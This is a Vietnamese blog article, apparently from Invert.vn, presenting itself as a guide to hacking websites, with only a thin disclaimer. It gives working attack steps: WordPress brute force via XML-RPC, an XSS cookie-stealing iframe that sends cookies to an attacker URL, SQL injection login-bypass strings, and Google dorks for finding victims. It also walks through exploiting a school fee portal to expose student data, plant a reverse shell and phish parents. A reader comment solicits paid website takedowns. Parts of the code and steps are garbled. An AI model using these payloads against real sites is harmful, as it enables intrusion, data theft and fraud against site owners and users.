Tài liệu

Cách Hack Website trong vòng một nốt nhạc, tỷ lệ thành công 100%

Do xu hướng sử dụng internet để tìm kiếm các website có chứa sản phẩm, dịch vụ và mua hàng trực tuyến ngày càng gia tăng. Nên có bao giờ bạn nghĩ cách hack Website như thế nào? Làm sao để không bị phát hiện hay không?

Sau đây, INVERT gởi đến bạn Cách hack Website đơn giản, ai cũng làm được, bài hướng dẫn theo giao diện mới.

Lưu ý: Việc hack Website của người kháckhông được cho phéphành vi phạm pháp luật. Vì vậy, bài viết chỉ được giới thiệu với mục đích tham khảo, giúp bạn nắm các nguyên lý cơ bản mà hacker đang sử dụng, từ đó có thể đề phòng và bảo vệ web của bản thân.

Xem thêm: 

Hack Website là gì? 

Hack Website là hành động xâm nhập trái phép vào Website ( phần cứng/phần mềm) hay truy cập vào các khu vực mà người dùng bình thường không được phép như hosting, trang quản trị, soạn thảo…

Ngoài ra, việc Hack website cũng can thiệp vào database, mã nguồn, chỉnh sửa nội dung và thay đổi các tính năng của Website trái phép nhằm đánh cắp dữ liệu, phá hoại danh tiếng, doanh thu của một hay nhiều doanh nghiệp. 

Hướng dẫn các cách hack Website đơn giản

Để có thể hack thành công một trang web, điều cần làm trước hết là bạn phải tìm hiểu đối tượng cần tấn công thông qua một số điều sau:

  • Công nghệ dùng build web đó: Bạn cần tra xem web được code bằng công nghệ gì? Web viết bằng PHP hay C#? dùng server gì? Phiên bản bao nhiêu?
  • IP thật của trang web: Để truy ra server trang web nằm ở đâu? Nhà cung cấp là ai? Đang dùng hệ điều hành nào? Phiên bản gì? (mall server, database,...), Port nào mở?
  • Scan những URL liên quan: Tìm sơ hở để tấn công các trang admin/login/resource/backup. 
  • Dùng tool để scan sơ những lỗ hổng bảo mật hay gặp của web (Nmap, Buidwith/WapPalyzer, TheHaverster/DNS, Dumspter, Dirbuster/ gobuster, BurpSuite/Nikto/Nessus)

1. Report trang web để hack Website

Cách làm đơn giản đầu tiên mà chúng tôi muốn giới thiệu đến các bạn để hack 1 trang Web chính là: Report trực tiếp trang web do nhà cung cấp hosting, cung cấp service để yêu cầu họ gỡ bỏ trang web. 

  • Ưu điểm: Dễ thực hiện, xác suất thành công cao nếu như bạn report các web spam, vi phạm bản quyền, lừa đảo, chứa nội dung phạm pháp, bạo lực,...
  • Nhược điểm: Tốn nhiều thời gian để nhà cung cấp duyệt, xem xét. Nếu là Web hợp pháp thì khả năng thành công bằng 0. Ngoài ra, chủ Web có thể dùng Cloudflare để ẩn IP thật, chuyển trang web qua nhà cung cấp khác an toàn hơn, hoặc tự host.
Lưu ý: Cách làm này chỉ có thể đánh sập chứ không thể lấy dữ liệu, làm hư web hoặc tra ra chủ trang web.

2. Tấn công Dò mật khẩu – Brute Force Attack

Brute Force Attack là kiểu tấn công bằng phương pháp dò mật khẩu cơ bản nhưng hiệu quả cao nhất. Phương pháp này sẽ sử dụng các thuật toán tự động thử các chuỗi mật khẩu khác nhau gồm số, chữ cái, chữ cái & số…để tìm ra mật khẩu chính xác. 

Khả năng thành công sẽ rất cao nếu người dùng sử dụng tài khoản: admin/password, admin/ 123456, admin/ 123abc…Để check xem thời gian trung bình dò 1 mật khẩu, bạn có thể kiểm tra tại: Password check – Kespersky Lab

Hiện nay, Có 2 cách tấn công Dò mật khẩu – Brute Force Attack: 

Cách 1: Gởi thông tin username/ password trực tiếp tới trang đăng nhập WordPress, mặc định là ten-mien/wp-admin hoặc ten-mien/wp-login.php.

Để phòng chống, bạn cần đổi đường dẫn đăng nhập (dùng plugin iThemes Security chẳng hạn) hoặc thêm tính năng mật khẩu 2 lớp (Two Factor Authentication), hay thêm Captcha checkbox….

Cách 2: Bạn gởi tới XML-RPC 1 lệnh wp.getCategories để truy xuất dữ liệu danh mục bằng login quyền Adminstrator nhằm lợi dụng phương thức system.multicall mà XML-RPC hỗ trợ. Khi đó, bạn có thể gởi kèm lệnh đó cùng với hàng trăm cặp username/password khác nhau.

Để phòng chống, bạn cần tắt XML-RPC thủ công từ hosting hay tắt 1 phần – chặn system.multicall bằng các plugin.

Tấn công Brute Force Attack qua XML-RPC
Tấn công Brute Force Attack qua XML-RPC

3. Tấn công lỗ hỗng của Web

Hầu hết, mỗi trang web đều sẽ có 1 lỗ hổng. Chính vì thế, bạn có thể tận dụng những lỗ hổng này để chiếm quyền truy cập, chạy script để phá hoại, đánh cắp dữ liệu hoặc upload shell.

Tuy nhiên, bạn cần phải có kiến thức về lập trình và bảo mật để biết cách hoạt động của 1 trang Web và những lỗ hỗng bảo mật hay gặp (XSS, SQL Injection ….) mới có hướng tấn công.

  • Ưu điểm: Rất hiệu quả và có thể truy cập được toàn bộ dữ liệu, chiếm quyền trên web server, xoá sạch dữ liệu hay đánh sập web.
  • Nhược điểm: Khá khó, tốn nhiều thời gian và đòi hỏi nhiều kiến thức bảo mật. 

Ngoài ra, bạn cần nắm được kiến thức các tool hay dùng sau:

  • Metasploit: Có chứa rất nhiều payload và code để tấn công 1 phiên bản phần mềm nào đó.
  • Searchsploit: Giống như Metasploit nhưng khó dùng hơn và nhiều code hơn.
  • Google: Sau khi biết được công nghệ web đó dùng (vd Apache 2.2). Bạn có thể Google Apache 2.2 exploit để tìm các lỗ hổng và cách tấn công nó.
  • BurpSuite/Fiddler/Postman: Dùng để chỉnh sửa request gửi lên/response nhận về từ server.
Metasplot và Searchsplot, 2 tool được giới hacker hay dùng
Metasplot và Searchsplot, 2 tool được giới hacker hay dùng

4. Sử dụng XSS để hack Website

Bước 1: Bạn tìm 1 trang dễ tấn công cho phép bạn đăng tải nội dung như 1 diễn đàn nào đó

Đầu tiên, bạn tìm 1 trang dễ tấn công cho phép bạn đăng tải nội dung như 1 diễn đàn nào đó đối với những trang không an toàn. 

Bước 2: Vào và đăng tải nội dung 

Tiếp theo, bạn nhập 1 số code (mã lập trình) đặc biệt vào phần "post" (Đăng) để thu thập toàn bộ dữ liệu của những người bấm vào nó. Bên cạnh đó, bạn phải kiểm tra code này có bị lọc bởi hệ thống hay không bằng cách đăng: <script>window.alert("test")</script>

Trường hợp, hộp cảnh báo xuất hiện khi bạn bấm vào bài đăng thì tức là website đó không an toàn.

 

Bước 3: Tạo và tải chương trình đánh chặn cookie của bạn

Sau đó, bạn tạo và tải chương trình đánh chặn cookie nhằm chiếm được cookie của người sử dụng để truy cập vào tài khoản trên các website có quy trình đăng nhập không an toàn.

Kế đó, bạn sử dụng chương trình đánh chặn cookie để chiếm và chuyển hướng cookie của đối tượng mục tiêu. Rồi bạn tải chương trình lên Website hỗ trợ để truy cập hoặc tham khảo thêm về code của các chương trình đánh chặn.

Bước 4: Đăng chương trình đánh chặn cookie của bạn

Tiếp đến, bạn nhập mã phù hợp vào bài đăng được dùng nhằm chiếm cookie và gửi chúng về trang của bạn. Lưu ý, bạn nên nhập 1 số văn bản sau đoạn code để bài đăng bớt đáng ngờ và không bị xóa. Ví dụ:

<iframe frameborder="0" height="0" width="0" class="lazy" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAMAAAACCAQAAAA3fa6RAAAADklEQVR42mNkAANGCAUAACMAA2w/AMgAAAAASUVORK5CYII=" data-src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

Bước 5: Sử dụng cookie thu thập được

Cuối cùng, bạn có thể sử dụng tùy ý thông tin cookie được lưu vào website của bạn rồi đấy. 

5. Tấn công Website bằng cách chèn mã độc

Bước 1: Tìm trang dễ tấn công 

Trước tiên, bạn nên tìm những trang có lỗ hổng trong quy trình đăng nhập quản trị bằng từ khóa admin login.asp trên Google.

Bước 2: Đăng nhập với quyền quản trị

Tiếp theo, bạn dùng admin cho tên đăng nhập và thử 1 vài chuỗi ký tự khác nhau cho phần mật khẩu. Thông thường là: 1’, ’1’='1 hoặc 2'='2.

Bước 3: Hãy kiên nhẫn

Có khả năng bạn sẽ phải thử nhiều lần nhưng đừng nản chí nhé.

Bước 4: Truy cập website

Cuối cùng, với những trang dễ tấn công, bạn sẽ tìm được chuỗi ký tự cho phép bạn truy cập bằng quyền quản trị là xong rồi. 

6. Cách để Hack một trang web với mã HTML cơ bản

Bước 1: Hiểu rằng phương pháp này không hiệu quả với hầu hết trang web

Trước hết, bạn phải hiểu rằng nếu mật khẩu và thông tin đăng nhập được lưu trữ ở các định dạng mã hóa thì bạn không thể truy cập bằng cách xem HTML của trang web. Bạn chỉ được phép truy cập nếu chúng dùng phương thức bảo mật HTML thô sơ. 

Bước 2: Mở trang web

Sau đó, bạn tiến hành truy cập vào trang web mà bạn muốn hack bằng trình duyệt như Chrome, Firefox hoặc Safari.

Bước 3: Truy cập phần "Login" (Đăng nhập)

Tại đó, nếu trang web có phần đăng nhập riêng, bạn phải bấm vào đường dẫn Log In hoặc Sign In để đến phần đó. Ngược lại, nếu như trang web hiển thị màn hình đăng nhập (hay nếu phần đăng nhập có trên trang chủ), bạn hoàn toàn có thể bỏ qua bước này.

Bước 4: Mở mã nguồn của trang web

Các trình đơn ở mỗi trình duyệt đều khác nhau. Do đó, để xem mã HTML của trang web, bạn chỉ cần nhấn Ctrl+U (trên Windows) hoặc

Mỗi trình duyệt đều có cách thao tác khác nhau từ trình đơn, nhưng cách đơn giản nhất để xem mã HTML của trang web là ấn Ctrl+U (trên Windows) hoặc ⌘ Command+U (trên Mac) để mở thẻ mới có mã nguồn của trang web.

Trường hợp, bạn sử dụng Microsoft Edge thì phải bấm vào Elements (Phần tử) trong trình đơn đang hiển thị mới có thể xem trang HTML.

Bước 5: Mở tính năng "Search" (Tìm kiếm)

Tiếp đó, trên thẻ mã nguồn, bạn bấm tổ hợp phím Ctrl+F (trên Windows) hoặc ⌘ Command+F (trên Mac) để thanh tìm kiếm hiển thị ở phía trên góc phải cửa sổ.

Bước 6: Tìm kiếm thông tin đăng nhập 

Kế đến, bạn nhập password vào ô tìm kiếm -> Tiến hành kéo xem các kết quả được tô sáng. Trường hợp, bạn không tìm thấy kết quả, hãy ấn pass để tìm lại rồi làm tương tự với user, username, login và từ khóa khác liên quan đến thông tin đăng nhập.

Nếu bạn sử dụng thông tin đăng nhập của quản trị viên để hack trang web thì tên người dùng có thể là "admin" hoặc "root".

Bước 7: Thử nhập sai tên người dùng và mật khẩu

Tới đây, nếu bạn không tìm được mã HTML hãy làm như sau:

  • Tiến hành đóng thẻ nguồn.
  • Nhập vài ký tự bất kỳ vào trường tên người dùng (hoặc địa chỉ email) và mật khẩu.
  • Bấm vào nút Log In.
  • Mở lại trang nguồn bằng cách ấn Ctrl+U hoặc ⌘ Command+U.

Bước 8: Tiếp tục tìm kiếm thông tin đăng nhập 

Tiếp đến, sau bạn dùng thông tin đăng nhập sai để cập nhật mã nguồn để phản hồi nội dung hiển thị trên trang -> Tiếp tục, dùng thanh tìm kiếm để tìm từ khóa liên quan đến thông tin đăng nhập.

Bước 9: Nhập thông tin đăng nhập tìm được trên trang 

Cuối cùng, khi bạn tìm được tên người dùng và mật khẩu từ HTML của trang -> Hãy thử nhập thông tin đó vào phần đăng nhập của trang web.

Trường hợp, bạn không thấy thông báo lỗi tức là bạn đã tìm được thông tin chính xác. Tuy nhiên, khả năng tìm được thông tin HTML giúp bạn đăng nhập thành công là cực kỳ thấp.

7. Tạo tiền đề để thành công hack Website

Bước 1: Học một vài ngôn ngữ lập trình

Trước tiên, bạn phải hiểu cách thức hoạt động của máy tính và các công nghệ khác. Để làm được điều đó, bạn có thể học cách sử dụng những ngôn ngữ lập trình như Python hay SQL nhằm kiểm soát máy tính tốt hơn và nhận diện được các điểm yếu bảo mật trong hệ thống.

Bước 2: Trang bị kiến thức HTML cơ bản 

Tiếp theo, bạn cũng cần hiểu sâu về html và javascript để hack các website dễ dàng. Bạn có thể học điều này trên internet. 

Bước 3: Tham khảo ý kiến "whitehat" - chuyên gia bảo mật máy tính

Ngoài ra, bạn cũng có thể tham khảo ý kiến của các chuyên gia bảo mật nhằm bảo vệ website của mình một cách tốt hơn hoặc học hack một cách đúng đắn. 

Bước 4: Tìm hiểu về hack 

Bên cạnh đó, bạn phải nghiên cứu và không ngừng học hỏi vì Website có thể bị tấn công theo vô số cách khác nhau và danh sách này biến đổi mỗi ngày.

Bước 5: Cập nhật

Ngoài ra, bởi kỹ thuật hack không ngừng thay đổi nên bạn cũng cần liên tục cập nhật để trong tương lai trang Web của bạn vẫn được an toàn. 

8. Cách hack pass admin website

Đây là 1 lỗi SQL khá phổ biến và dễ bị Bypass 0day. Chính vì vậy, bạn có thể sử dụng Google để kiếm Website lỗi bằng các bước sau đây:

Bước 1: Tìm kiếm con mồi

Đầu tiên, bạn vào Google gõ lệnh dưới đây vào ô tìm kiếm (có dấu ” ” )

"İmam Lisesi Mezunları"

hoặc:

"İmam Lisesi Mezunları" inurl:php?id=

Bước 2: Lựa chọn con mồi

Sau đó, bạn tiến hành truy cập vào 1 Website bất kỳ dưới kết quả tìm kiếm của Google

Ví dụ: Bạn vào thử trang http://bihader.org/duyurular.htm 

Kế đến, bạn truy cập vào Link quản trị Admin của Website có dạng là: http://Site-bị-lỗi.com/admin/login.php. Khi đó, link Admin sẽ là: admin/login.php

Bước 4: Bypass Admin

Tiếp đến, khi bạn đã vào được Admin, hãy tiếp tục bypass Admin thông qua lỗi SQL bằng User và Pass dưới đây nhé

  • Username: ‘=’ ‘or’
  • Password: ‘=’ ‘or’

Bước 5: Kết quả

Cuối cùng, quyền Admin đã trong tay bạn, thích làm gì thì làm nhé

9. Cách hack web trên điện thoại

Bước 1: Cài đặt UserLAnd & Nhập kho Kali

UserLAnd là một ứng dụng Android cho phép người dùng tạo ra 1 hệ điều hành Debian (HĐH) nhằm để nhập kho công cụ Kali. Từ đó, có quyền truy cập đầy đủ vào 1 số công cụ kiểm tra cũng như hack trang web tốt nhất.

Cách thực hiện: Bạn chỉ cần nhấn Ctrl + C để dừng quét cụ thể để RapidScan tự động quét tiếp theo. Tuy nhiên, giao diện Wi-Fi không được chuyển sang chế độ màn hình và các công cụ hack Wi-Fi truyền thống như Aircrack-ng sẽ không hoạt động.

Bước 2: Cài đặt phụ thuộc RapidScan

Tiếp theo, bạn đăng nhập vào hệ điều hành Kali hoặc Debian trong UserLand bằng chức năng SSH tích hợp hay máy khách SSH như ConnectBot.

Kế đó, bạn nhập thiết bị đầu cuối gốc để thực hiện các lệnh sau: 

su

Tiếp đến, bạn cập nhật hệ thống để mọi thứ đồng bộ hóa tốt.

apt update

Tới đây, bạn cài nhiều công cụ hack được RapidScan sử dụng với lệnh apt-get bên dưới chạy bằng RapidScan. Nếu một công cụ không được tìm thấy cài đặt, nó sẽ được trực tiếp chuyển sang 1 công cụ khác.

apt-get install python screen wapiti whatweb nmap golismero host wget uniscan wafw 00f dirb davtest theharvester xsser dnsrecon fierce dnswalk whois sslyze lbd dnsen um dmitry davtest nikto dnsmap
Reading package lists... Done                                                Building dependency tree                                                      Reading state information... Done                                                The following additional packages will be installed: docutils-common docutils-doc gir1.2-glib-2.0 libgirepository-1.0-1 libnet-netmas k-perl libpaper-utils libpaper1 libpython-all-dev libstring-random-perl libxml-writer-perl nmap-common python-al 1 python-all-dev python-bson python-dbus python-docutils python-entrypoints python-gi python-gridfs python-keyring python -keyrings.alt python-pip python-pip-whl The following packages will be upgraded: nmap nmap-common python-pkg-resources wget 4 upgraded, 45 newly installed, 0 to remove and 181 not upgraded.                                                  Need to get 29.2 MB of archives.                                                After this operation, 96.9 MB of additional disk space will be used.    Do you want to continue? [Y/n] y
Lưu ý: Tuỳ vào tốc độ mạng mà quá trình cài đặt có thể mất tới 1 giờ đồng hồ, bạn nên kiên nhẫn nhé. 

10. Hack web trường

Lỗ hổng 1

Đầu tiên, bạn phải tìm được thư mục con mà burp crawler đã tìm thấy như xhjc để URI trở thành https://ugtfdxlm.com/xhjc.

Khi đó, bạn sẽ thấy 1 trang php có chức năng là lấy số nhập học duy nhất và DOB của sinh viên để làm đầu vào và hiển thị chi tiết học phí liên quan đến sinh viên đó.

Tiếp tục, bạn nhập 1 số nhập học ngẫu nhiên DOB và gửi nó để gây ra lỗi. Tuy nhiên, nó lại tạo ra 1 yêu cầu GET.

Ví dụ: https://ugtfdxlm.com/xhjc?stud_id=87263&dob=2011–01–23.

Sau đó, bạn tiếp tục thêm payload tính toán của SQLi trong yêu cầu, tức là https://ugtfdxlm.com/xhjc?stud_id=87263’+oR+1=1+#&dob=2011–01–23 và gửi nó. Khi đó, lỗi đã biến mất và trang web dính lỗi SQLi.

Ngoài ra, các thông tin nhạy cảm của học sinh như số nhập học của họ, tên, tên cha, DOB, số điện thoại di động, chi tiết học phí,… cũng được hiển thị.

Tại đây, bạn có thể tải payload reverse shell của riêng mình lên máy chủ để nắm quyền kiểm soát. Bên cạnh đó, nếu bạn có đặc lệnh INSERT INTO thì bạn có thể chèn các hàng mới hoặc thậm chí cập nhật các hàng như làm cho học phí bằng 0 thông qua các điểm CVSS sẽ được gán cho lỗ hổng này. Tuy nhiên, việc làm này là phi đạo đức nhé. 

Lỗ hổng 2

Tiếp theo, trên cùng 1 trang, bạn cũng có thể thêm 1 số thẻ HTML trong tham số GET chẳng hạn như: https://ugtfdxlm.com/xhjc?stud_id=<h1>HELLO HTMLi</h1>&dob=2011–01–23 và gửi nó.

Khi đó, bạn có thể thể giả mạo nội dung trang và chứng minh rằng mình có thể chèn HTML vào trang web. Hình dưới đây là điểm CVSS sẽ được gán cho lỗ hổng này:

Lỗ hổng 3

Tiếp đến, vì URL https://ugtfdxlm.com/xhjc?stud_id=87263&dob=2011–01–23 chấp nhận thẻ. Chính vì vậy, nó cũng dễ bị tổn thương bởi lỗ hổng XSS. URL sẽ trở thành https://ugtfdxlm.com/xhjc?stud_id=<script>Hacked</script>&dob=2011–01–23.

Khi đó, bạn có thể sử dụng lỗ hổng này để thêm biểu mẫu của riêng mình yêu cầu DOB và số lượng sinh viên nhập học và khi nộp hồ sơ.

Cùng lúc đó, bạn lấy những chi tiết đó trong máy chủ bằng cách sử dụng javascript để URL được gửi đến cha mẹ và biến họ thành nạn nhân của  vụ lừa đảo. Đó chính là lý do tại sao HTMLi và XSS cũng là những lỗ hổng nghiêm trọng và điểm CVSS sẽ được gán cho lỗ hổng này:

Lỗ hổng 4

Hầu hết, các lỗ hổng được tìm thấy liên quan đến GET của URL nên kiểm tra trên miền cz các trang khác là tĩnh. Và khả năng sẽ có một lỗi/cấu hình sai trên trang web bằng tính năng Click jacking trong trang web hoạt động cz tiêu đề X-frame bị thiếu.

Trên đây là cách hack Website do đội ngũ INVER chia sẻ, hi vọng thông tin này sẽ hữu ích đến quý bạn đọc.

Còn bao nhiêu ngày nữa đến Tết Giáp Thìn 2024? Đếm ngược Tết 2024

Nguồn: Invert.vn

Tags: cách hack web trên điện thoạihack web trườngcách hack pass admin website
Đồng Phục Trang Anh

Bình luận (35)

  1. Image

    # 8 Tháng Giêng, 2023

    Mình cần thuê người đánh sập vài web Lh số điện thoại 0934 513 831

Gửi bình luận của bạn

(*) yêu cầu nhập

Nội dung bình luận (*)
Họ tên
Email
Dự Án Tại TP. Hồ Chí Minh